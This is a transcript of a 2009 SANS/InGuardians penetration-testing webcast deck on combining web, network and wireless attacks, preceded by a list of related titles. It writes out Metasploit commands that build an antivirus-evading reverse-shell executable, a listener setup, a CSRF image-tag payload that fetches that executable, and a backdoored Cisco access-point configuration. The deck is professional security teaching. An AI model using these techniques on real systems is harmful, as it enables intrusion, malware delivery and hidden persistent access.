Pen Testing Perfect Storm Part 3-2009, InGuardians 1



Similar documents
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2

The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4

How To Hack A Network With A Network Security Attack On A Web Browser (For A Free Download) (For Free) ( For A Free) On A Network) (On A Free Downloaded) (Or For A Paid Download) On An Ip

How We're Getting Creamed

The Pen Test Perfect Storm Part 5: We Love Adobe!

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

How to hack a website with Metasploit

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

STABLE & SECURE BANK lab writeup. Page 1 of 21

CYBERTRON NETWORK SOLUTIONS

Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

(WAPT) Web Application Penetration Testing

Exploiting Transparent User Identification Systems

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

WHITEPAPER. Nessus Exploit Integration

Threat Intelligence Pty Ltd Specialist Security Training Catalogue

Setting up a WiFi Network (WLAN)

Configuring Security Solutions

Penetration Testing: Lessons from the Field

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Learn Ethical Hacking, Become a Pentester

Table of Contents. Cisco Wi Fi Protected Access 2 (WPA 2) Configuration Example

Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)

Mass Pwnage 4 Dummies. Latest pen-testing tricks using Metasploit

Penetration Testing Report Client: Business Solutions June 15 th 2015

Certified Ethical Hacker Exam Version Comparison. Version Comparison

Robust security is a requirement for many companies deploying a wireless network. However, creating a secure wireless network has often been

CORE Security and the Payment Card Industry Data Security Standard (PCI DSS)

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

The Pen Test Perfect Storm: We Love Cisco! Pen Test Techniques Part 6

Rational AppScan & Ounce Products

Topics in Network Security

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Vulnerability Assessment and Penetration Testing

McAfee Certified Assessment Specialist Network

The Top Web Application Attacks: Are you vulnerable?

June 2014 WMLUG Meeting Kali Linux

Essential IT Security Testing

NEXPOSE ENTERPRISE METASPLOIT PRO. Effective Vulnerability Management and validation. March 2015

STEP III: Enable the Wireless Network Card. STEP IV: Print out the Printer Settings pages to determine the IP Address

Overview of the Penetration Test Implementation and Service. Peter Kanters

Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Maintaining Access CHAPTER 10 CHAPTER OVERVIEW AND KEY LEARNING POINTS INTRODUCTION INFORMATION IN THIS CHAPTER

QualysGuard WAS. Getting Started Guide Version 4.1. April 24, 2015

Where every interaction matters.

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Penetration Testing Walkthrough

Developing Network Security Strategies

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

Security Awareness. Wireless Network Security

Kautilya: Teensy beyond shells

Using Nessus In Web Application Vulnerability Assessments

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Appalachian Regional Commission Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement... 2

Web attacks and security: SQL injection and cross-site scripting (XSS)

Ethical Hacking as a Professional Penetration Testing Technique

THE OPEN UNIVERSITY OF TANZANIA

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Professional Penetration Testing Techniques and Vulnerability Assessment ...

CRYPTUS DIPLOMA IN IT SECURITY

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

Penetration Testing Report. Client: xxxxxx Date: 19 th April 2014

PCI Compliance - A Realistic Approach. Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM hjoshi@cbiz.com

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Lucent VPN Firewall Security in x Wireless Networks

Top 10 Security Checklist for SOHO Wireless LANs

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Automation of Post-Exploitation

Using Free Tools To Test Web Application Security

CEH Version8 Course Outline

Wireless Robust Security Networks: Keeping the Bad Guys Out with i (WPA2)

CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks

Penetration Testing with Kali Linux

I Hunt Penetration Testers!

How To Test For Security On A Network Without Being Hacked

Why The Security You Bought Yesterday, Won t Save You Today

BYOD: BRING YOUR OWN DEVICE.

Adobe Systems Incorporated

DiamondStream Data Security Policy Summary

S E C U R I T Y A S S E S S M E N T : B o m g a r A p p l i a n c e s

From Rivals to BFF: WAF & VA Unite OWASP The OWASP Foundation

Application security testing: Protecting your application and data

Chapter 15: Computer and Network Security

Penetration Test JSPLC. Contact: James, APS (CCNA, CEH) mail.biz

WiNG5 CAPTIVE PORTAL DESIGN GUIDE

Exam Questions SY0-401

The Trivial Cisco IP Phones Compromise

Transcription:

June 1-2, 2009 Paris Hotel Las Vegas, NV www.sans.org/pentesting09_summit How are compliance requirements driving my pen testing strategies and how can I maximize my returns? What skills and techniques do the world s top pen testers use? What worked and what didn t in Penetration Testing at enterprises large and small? What are the industry leading Penetration Testing tools both free and commercial? How can they be implemented most effectively? Your WebCast will start shortly Tool demonstrations from leading vendors Register Now and Receive a 15% Discount! Use discount code PerfectStorm15 Pen Testing Perfect Storm Part 3-2009, InGuardians 1 Discount also available through June 22, 2009 for the following courses: SEC560, SEC617, and SEC542

The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 3 By Kevin Johnson, Ed Skoudis, & Joshua Wright Copyright 2009, All Rights Reserved Version 1Q09 Pen Testing Perfect Storm Part 3-2009, InGuardians 2

Outline Previously in the Trilogy Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 3

Previously on 24 To recap, in Parts 1 & 2 of this trilogy, we discussed how pen tests and testers are often categorized: 1) Network tests 2) Web application tests 3) Wireless tests 4) Others, but those are the biggies We also proposed that if you want to be a great pen tester make sure you can pivot between network pen tests, web app tests, and wireless pen tests Furthermore, integrate these attack vectors together into a much more powerful combined attack To procure great pen tests, specify combined tests Pen Testing Perfect Storm Part 3-2009, InGuardians 4

Pen Tester And, We Covered a Scenario Internet Exploit client-side vulnerability in wired XP client WWW 1 Firewall Infrastructure DNS Dump hashes, use Metasploit route command to pivot, and run psexec exploit with pass-the-hash against Vista box get command shell on Vista. 3 4 Install VistaRFMON, NetMon, capture wireless traffic. Bring capture home, analyze and crack. DNS 2 Target Network Wired Windows XP Client with vulnerable browser Identify local preferred wireless networks with saved PSK in profile. Manually connect saved profile. Vista Client WPA2 PSK Lather, rinse, repeat Additional Target Network Firewall Corporate Web Firewall App with PII Run w3af to find 5 Additional command Target Network injection flaw. oscommanding shell provides access to find PII Pen Testing Perfect Storm Part 3-2009, InGuardians 5 6

Today s Focus Let s build on the concept of combined testing We ll discuss useful new tools and techniques In Part 1, the flow was 1) wireless 2) web app 3) network In Part 2, the flow was 1) network 2) wireless 3) web app To illustrate the pragmatic and iterative nature of combined tests, we ll alter the order this time: 1) Web App attack Discovery and exploitation (Ratproxy, Yokoso!) 2) Network exploitation Useful Metasploit features (msfpayload, msfencode, multi-encode options for dodging Anti-Virus) 3) Wireless attack Wireless Geo-location, GeoWig, and Ghost in the AP techniques Pen Testing Perfect Storm Part 3-2009, InGuardians 6

Outline Previously in the Trilogy Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 7

Ratproxy: Passive Interception Proxy Ratproxy is a mostly passive scanner Active tests are enable-able! Designed to proxy traffic and scan for flaws Based on the interplay between client and server Focuses on Web 2.0 flaws Includes the ability to decompile and analyze Flash objects Was one of the first tools to find Cross-Site Request Forgery (CSRF) flaws well Ratproxy allows us to combine mapping the application and running a first pass looking for flaws Efficiency is the key! Chaining Ratproxy with other interception proxies that spider the site is one of our tricks CSRF Flaw with various Pen Testing qualifiersperfect Storm Part 3-2009, InGuardians 8

Yokoso! Infrastructure Fingerprinting Originally designed to be an infrastructure fingerprinter Delivered via XSS flaws Contains three parts Lists of interesting URIs JavaScript code to find those URIs in browser history JavaScript code to find those URIs within the target network Attacker Controlled Web Site reporting history to attacker These parts are usable on compromised machines Also come bundled for use within BeEF The project is looking for more help collecting interesting URIs For instructions, please visit http://yokoso.inguardians.com Victim browses to XSS site Yokoso! determines interesting sites visited Yokoso! code delivered XSS Injected Web Site Client Browser Pen Testing Perfect Storm Part 3-2009, InGuardiansWeb Sites 9 1 5 3 2 4

Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 10

Packaging an Attack with msfpayload Use the msfpayload tool in Metasploit 3.X to turn a payload into an EXE $./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 X The X generates an executable There are other options, including R, for raw We could put the payload on a USB token, send it via e-mail, put it on a file share, etc. Or, I don t know maybe deliver it via CSRF? Just wait But, won t an AV tool detect it? Perhaps so let s encode it to evade detection! Pen Testing Perfect Storm Part 3-2009, InGuardians 11

Evading IDS/IPS/AV with msfencode Metasploit supports encoding exploits and payloads In msfconsole, use show encoders and set ENCODER [encoder] Or, you can use msfencode program to encode a raw payload The latest trunk version supports a c [N] option, to apply N rounds of encoding One of the best encoders for evasion is x86/shikata_ga_nai Japanese for nothing can be done about it $./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 R./msfencode e x86/shikata_ga_nai c 4 t exe o payload.exe You need to get Metasploit ready for the inbound connection: msf > use exploit/multi/handler msf > set PAYLOAD windows/shell/reverse_tcp msf > set LHOST [AttackerIPaddr] msf > set LPORT 80 msf > exploit Pen Testing Perfect Storm Part 3-2009, InGuardians 12

Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 13

Wireless Geo-Location Question: Where is the client device I have just exploited? IP address information can be misleading (VPN, static, internal networks) iphone pseudo GPS uses nearby Wi-Fi and cellular towers for location analysis Not enough integrated GSM/EV-DO interfaces to use cell tower locations Wi-Fi device location database available with the WIreless Geographic Logging Engine www.wigle.net, inspired by wardrivers! Pen Testing Perfect Storm Part 3-2009, InGuardians 14

What Networks Are Nearby? Vista and OSX provide command-line tools for network discovery (no love for XP) C:\>netsh wlan show networks mode=bssid find "BSSID" BSSID 1 : 00:1a:53:c1:d3:b6 BSSID 1 : 00:8d:75:ac:6c:fd BSSID 1 : 00:78:6a:f6:b0:b2 BSSID 1 : 00:1c:df:28:ca:98 BSSID 1 : 00:e3:e2:00:a0:5e BSSID 1 : 00:c5:17:34:8b:a3 Vista $ cd /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources $./airport -s SSID BSSID RSSI CHANNEL SECURITY (auth/unicast/group) Belkin_N1_Wireless_A48C93 00:00:f6:38:00:fd -88 6 NONE 07FX10055314 00:1a:53:c1:d3:b6-81 6 WEP Nicole 00:1c:df:28:ca:98-67 11 WEP somethingclever 00:78:6a:f6:b0:b2-52 1 WPA(PSK/TKIP/TKIP) OS X rugby 00:c5:17:34:8b:a3-87 6 WPA(PSK/TKIP/TKIP) jrockets 00:8d:75:ac:6c:fd -33 6 WPA(802.1x/TKIP/TKIP) NETGEAR 00:e3:e2:00:a0:5e -91 11 NONE Pen Testing Perfect Storm Part 3-2009, InGuardians 15

WiGLE Search Free account required to search by BSSID Pen Testing Perfect Storm Part 3-2009, InGuardians 16

Tool: GeoWig Automates searching WiGLE for BSSIDs Heuristics to identify APs with similar MAC addresses Common in corporate WLAN deployments Available soon: www.inguardians.com/tools C:\>python geowig.py u josh -p password 00:1a:53:c1:d3:b6 00:8d:75:ac:6c:fd 00:78:6a:f6:b0:b2 00:1c:df:28:ca:98 00:e3:e2:00:a0:5e 00:c5:17:34:8b:a3 GeoWiG 0.1 - Geographic Wireless Guesser. <jwright@willhackforsushi.com> Please remember to support the WiGLE Project! http://www.wigle.net * Successfully authenticated to wigle.net * Searching for: 00:1a:53:c1:d3:b6 00:8d:75:ac:6c:fd 00:78:6a:f6:b0:b2 00:ba:76:28:ca:98 00:e3:e2:00:a0:5e 00:c5:17:34:8b:a3 Found 5 entries for 6 BSSIDs, calculated lat/lon: 41.74945145-71.35841522 Pen Testing Perfect Storm Part 3-2009, InGuardians 17

Ghost in the AP Compromised APs provide tremendous value in a pen-test Leveraged as a network backdoor Configure additional virtual SSIDs Cloaked SSID with authorized (or similar) MAC address (may go unnoticed) Attacker can target any VLAN accessible to compromised AP! Cisco Aironet device as an example, applies to many device manufacturers Pen Testing Perfect Storm Part 3-2009, InGuardians 18

username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods! ssid KJOGuest vlan 156 guest-mode authentication open Before Dubious Configuration username admin1 privilege 15 secret 5 $1$9Q... username admin2 privilege 1 secret 5 $1$8oR... username acoop privilege 15 secret "evilpass" aaa authentication login local enable interface Dot11Radio0 encryption vlan 101 ciphers aes-ccm encryption vlan 1 ciphers aes-ccm encryption vlan 102 ciphers aes-ccm! ssid KJOCorpNet vlan 101 guest-mode authentication network-eap eap_methods! ssid KJOGuest vlan 156 guest-mode authentication open!! Backdoor network access SSID on mgmt VLAN ssid attackerbackdoorwlan wpa-psk ascii KevinReallyWearsGlasses vlan 1 no guest-mode!! Attacking any other accessible VLAN example ssid attackvlan102 wpa-psk ascii YouWontGuess vlan 102 Pen Testing Perfect Storm Part 3-2009, InGuardians 19 no guest-mode Eeek!

Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 20

Analyze Website with RatProxy Find CSRF Flaw Use Ratproxy to evaluate target website 1 2 Pen Tester Find CSRF flaw that allows upload of files in URI with predictable parameters Internet WWW DNS ESSID=CorpAP Corp AP Target Network Wired Windows Client Firewall Infrastructure Pen Tester s Website Third-party site hosting content Internal Network Server Internal User Pen Testing Perfect Storm Part 3-2009, InGuardians 21

Build AV-Dodging Payload & Place on Load CSRF Trigger 3 Use msfpayload and msfencode to build AVresistant backdoor EXE Rev Shell EXE 4 Pen Tester Place EXE on pen tester s own website Rev Shell EXE Pen Tester s Website Place CSRF activating link on third-party site (e.g., blog) Internet 5 Third-party site hosting content WWW Firewall Infrastructure DNS ESSID=CorpAP Corp AP Internal Network Server Target Network <img src="http://target.tgt/addcontent.aspx? name=new%20version& content=http%3a%2f%2ftester.src%2fexecutable.exe"> Internal User Wired Windows Client Pen Testing Perfect Storm Part 3-2009, InGuardians 22

Get Victim to Access CSRF, Making Browser Load Content Pen Tester Rev Shell EXE Pen Tester s Website Website content loading function grabs EXE as new content 8 Internet Third-party site hosting content Rev Shell EXE WWW Firewall Infrastructure <img.> DNS 7 6 Client browser (following the ESSID=CorpAP src of the img tag) invokes function on website to load new content Corp AP Client visits page with content containing Internal <img Network tag> Server reference to CSRF flaw on target s web site Target Network Internal User Wired Windows Client <img.> Pen Testing Perfect Storm Part 3-2009, InGuardians 23

Other Victim Accesses Content, Running Reverse Shell Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content Rev Shell EXE WWW Firewall Infrastructure DNS ESSID=CorpAP Access content newly uploaded to website, downloading EXE and running it Corp AP 9 Internal Network Server Target Network 10 Wired Windows Client Reverse shell connects back to penetration tester Internal User Pen Testing Perfect Storm Part 3-2009, InGuardians 24

Use GeoWig to Verify In-Scope & Use Yokoso! to Admin Devices Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW Firewall Infrastructure DNS ESSID=CorpAP Corp AP Internal Network Server Load and run Yokoso! to find URIs of devices managed from here. 12 Target Network 11 Load and run GeoWig to determine geographic Internal location and User verify scope. Wired Windows Client Pen Testing Perfect Storm Part 3-2009, InGuardians 25

Attack AP and Implement Ghost in the AP Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW Firewall Infrastructure DNS Discover CorpAP and attack it via wired management interface ESSID=CorpAP Corp AP Internal Network Server Target Network Internal User 13 Wired Windows Client Implement Ghost in the AP for backdoor 14 Pen Testing Perfect Storm Part 3-2009, InGuardians 26

Access Target Network from Virtual AP & Attack Servers Pen Tester Rev Shell EXE Pen Tester s Website Internet Third-party site hosting content WWW DNS Attack Firewall internal Infrastructure network ESSID=CorpAP ESSID=GhostAP1 ESSID=GhostAP2 16 Corp AP Internal Network Server 15 Target Network Access target network using new backdoor Ghost AP Internal User Pen Tester Wired Windows Client Pen Testing Perfect Storm Part 3-2009, InGuardians 27

Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 28

The Future of Combined Pen Tests More penetration tests moving in this direction Will change budgeting of some tests Combined testing provides a way to differentiate offerings from vuln assessment and compliance checks No-holds barred penetration testing Some organizations are exploring full-contact pen tests where combined methods are the rule, not the exception Even in such tests, carefully spell out the scope and rules of engagement Tools are merging and packaging various techniques together: BeEF, Metasploit, Core, Immunity Pen Testing Perfect Storm Part 3-2009, InGuardians 29

Additional Thoughts on the Future We believe regulations and industry standards will begin to move in this direction Perhaps not immediately, but eventually, in light of high-profile breaches using these techniques Bad guys increasingly do this it s not just hypothetical Pen Testing Perfect Storm Part 3-2009, InGuardians 30

Outline Previously Web App Attacks Kevin Fu Network Attack Ed Fu Wireless Attacks Josh Fu Combining It All Together A Scenario The Future Conclusions and Q&A Pen Testing Perfect Storm Part 3-2009, InGuardians 31

Conclusions Combined attack vectors allow for far deeper penetration into most target networks than separate vectors Combining web app, network, and wireless penetration testing is very powerful This combination provides a much more accurate view of the business risks posed by vulnerabilities than offered by completely separate network, wireless, and web app tests Pen Testing Perfect Storm Part 3-2009, InGuardians 32

References Metasploit: www.metasploit.com Yokoso!: yokoso.inguardians.com Ratproxy: code.google.com/p/ratproxy GeoWig: www.inguardians.com/tools Pen Testing Perfect Storm Part 3-2009, InGuardians 33

Upcoming In-Depth SANS Pen Test Courses SANS 560: Network Pen Testing and Ethical Hacking Tysons Corner, VA, April 15: Galbraith Register Now Toronto, Canada, May 6: Shewmaker and Receive a Las Vegas, NV, June 3: Skoudis 15% Discount Baltimore, MD, June 15: Strand on these SANS 542: Web App Pen Testing and Ethical Hacking courses offered before June 15! New Orleans, May 5: Johnson Use discount Amsterdam, Netherlands, May 11: Misenar code Baltimore, MD, June 15: Johnson PerfectStorm15 Denver, CO, July 8: Staff SANS 617:Wireless Ethical Hacking, Pen Testing, & Defenses Baltimore, MD, June 15: Wright Denver, CO, July 8: Wright London, England, July 13: Siles Pen Testing Perfect Storm Part 3-2009, InGuardians 34

June 1-2, 2009 Paris Hotel Las Vegas, NV www.sans.org/pentesting09_summit Featuring Top-Notch Presentations from: HD Moore on the future of Metasploit Joshua Wright on evolving wireless attacks Jeremiah Grossman on web app vulnerability assessments Robert rsnake Hansen on web app vulnerabilities Paul Asadoorian on late-breaking pen test techniques Larry Pesce on using document metadata in pen tests Jason Ostrum on VoIP pen testing Ed Skoudis on secrets of pen testing Register Now and Receive a 15% Discount! Use discount code PerfectStorm15 Pen Testing Perfect Storm Part 3-2009, InGuardians 35

Webcast Questions and Answers We ll answer some questions on this webcast We ll also continue the discussion for a week at ethicalhacker.net Post a question in the forum dedicated to this webcast trilogy Josh, Kevin, and Ed will periodically check out questions there and answer Details at www.ethicalhacker.net/component/option,com_smf/i temid,54/topic,3807.0/ Or, just surf to www.ethicalhacker.net and click on the associated article Pen Testing Perfect Storm Part 3-2009, InGuardians 36